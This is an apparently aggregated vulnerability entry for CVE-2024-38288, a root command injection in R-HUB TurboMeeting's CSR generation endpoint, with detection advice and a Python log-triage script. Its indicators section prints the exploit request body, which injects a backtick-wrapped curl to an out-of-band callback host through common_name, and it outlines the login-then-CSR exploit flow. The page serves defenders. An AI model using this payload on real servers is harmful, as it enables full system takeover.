CVE-2024-38288
published 2024-07-25


Priority: P258 · Severity: high · CVSS 3.1: 7.2
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.22% (86.6th percentile)
A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with administrator privileges to execute arbitrary commands on the underlying server as root.

Affected

1 range
Vendor | Product | Version range | Fixed in
rhubcom | turbomeeting | < 8.0 | 8.0

Detection & IOCs (extracted from sources)

url: /as/wapi/login
url: /as/wapi/generate_csr
command: sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
path: /as/wapi/profile_entry
  • Monitor POST requests to /as/wapi/generate_csr containing shell metacharacters (backticks, percent-encoded quotes, pipe characters) in the common_name, company_name, state, city, or country fields — these indicate command injection attempts in the CSR generation endpoint.
  • Alert on successful authentication to /as/wapi/login followed immediately by a POST to /as/wapi/generate_csr within the same session (sid), especially from admin accounts, as this matches the exploit flow.
  • Look for outbound DNS or HTTP callbacks (e.g., curl to external hosts) originating from the TurboMeeting server process, which may indicate successful command injection via the CSR feature.
  • The session ID (sid) is extracted from a redirect URL pattern after login; monitor for automated extraction of sid values followed by CSR generation requests as a sign of scripted exploitation.
  • Exploitation requires valid administrator credentials; this is a post-authentication vulnerability, so detections should be scoped to authenticated admin sessions.
  • The injected commands execute as root on the underlying server, meaning successful exploitation grants full system compromise; prioritize detection and response accordingly.
  • The vulnerability affects R-HUB TurboMeeting through version 8.x; ensure detection rules are applied to all instances up to and including the 8.x branch.
  • The exploit template uses a 20-second timeout for the CSR request, suggesting the injected command may introduce a delay; network-level detections should account for unusually long response times on /as/wapi/generate_csr.
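The monitoring points above (metacharacters in the CSR fields, a login shortly before the CSR request, and a slow response) can be combined into one triage pass over request logs. This is an added example, not code from the original page or from the vendor; the record layout, the correlation by source address instead of sid, the two thresholds and the extended metacharacter set are assumptions.

```python
import re
from urllib.parse import parse_qsl

CSR_PATH = "/as/wapi/generate_csr"
LOGIN_PATH = "/as/wapi/login"
CSR_FIELDS = {"common_name", "company_name", "state", "city", "country"}
# Backtick, quote and pipe come from the page; the rest is an assumed extension.
SHELL_META = re.compile(r'[`"|;<>\r\n]|\$\(')

def suspicious_fields(body):
    """Return {field: decoded value} for CSR fields holding shell metacharacters."""
    pairs = parse_qsl(body, keep_blank_values=True)  # percent-decodes each value
    return {k: v for k, v in pairs if k in CSR_FIELDS and SHELL_META.search(v)}

def triage(records, login_window=60, slow_after=10.0):
    """Return one finding per POST to the CSR endpoint that carries metacharacters."""
    last_login = {}  # source address -> time of its last login request
    findings = []
    for r in sorted(records, key=lambda rec: rec["ts"]):
        if r["path"] == LOGIN_PATH:
            last_login[r["src"]] = r["ts"]
        elif r["method"] == "POST" and r["path"] == CSR_PATH:
            hits = suspicious_fields(r["body"])
            if hits:
                since = r["ts"] - last_login.get(r["src"], float("-inf"))
                findings.append({
                    "src": r["src"], "ts": r["ts"], "fields": sorted(hits),
                    "login_just_before": since <= login_window,   # assumed window
                    "slow_response": r["secs"] >= slow_after,      # assumed threshold
                })
    return findings

# Constructed sample records (not real traffic); the dict layout is hypothetical.
SAMPLE = [
    {"ts": 100, "src": "192.0.2.10", "method": "POST", "path": LOGIN_PATH,
     "body": "", "secs": 0.2},
    {"ts": 103, "src": "192.0.2.10", "method": "POST", "path": CSR_PATH,
     "body": "sid=PLACEHOLDER&common_name=1%22%20%60PLACEHOLDER%60"
             "&company_name=1&state=1&city=1&country=US", "secs": 19.4},
    {"ts": 500, "src": "198.51.100.7", "method": "POST", "path": CSR_PATH,
     "body": "sid=PLACEHOLDER&common_name=meet.example.org"
             "&company_name=Example+Ltd&state=CA&city=Fresno&country=US", "secs": 0.8},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Matching is done on the decoded field values, so percent-encoded and literal forms of the same character are treated alike.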